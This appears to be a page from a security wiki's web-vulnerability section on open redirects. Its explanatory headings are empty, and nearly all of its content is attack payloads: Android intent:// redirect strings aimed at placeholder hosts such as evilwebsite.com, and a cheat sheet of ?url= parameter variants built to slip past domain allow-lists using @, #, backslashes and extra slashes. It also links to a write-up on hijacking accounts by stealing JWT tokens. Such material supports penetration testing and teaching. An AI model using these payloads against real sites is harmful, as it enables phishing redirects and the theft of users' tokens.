Open Redirect

What is it?

Exploitation

Example Payloads

@sirdarckcat example open redirect

http://evilwebsite.com/xss.php?redir_xss=intent://anyhostname.com/anypath?etc#Intent;package=x;S.browser_fallback_url=https://envil.website;end;%20

Shorter payload:
intent://anyhostname.com#Intent;scheme=evil.website;end

Cheat sheet

Basic Attack [ref1]

?url=https://www.hahwul.com

Open Redirect bypass pattern

?url=https://allow_domain.hahwul.com
?url=https://[email protected]
?url=https://www.hahwul.com#allow_domain
?url=https://www.hahwul.com?allow_domain
?url=https://www.hahwul.com\allow_domain
?url=https://www.hahwul.com&allow_domain
?url=http:///////////www.hahwul.com
?url=http:\\www.hahwul.com
?url=http:\/\/www.hahwul.com

Other Resources

swisskyrepo's PayloadsAllTheThings https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect/Intruder

Hijacking accounts by retrieving JWT tokens via unvalidated redirects https://www.shawarkhan.com/2019/01/hijacking-accounts-by-retrieving-jwt.html

References

[ref1] : https://www.hahwul.com/p/ssrf-open-redirect-cheat-sheet.html?m=1

PreviousInsecure Desensitization NextCommand Injection

Last updated 4 years ago

Was this helpful?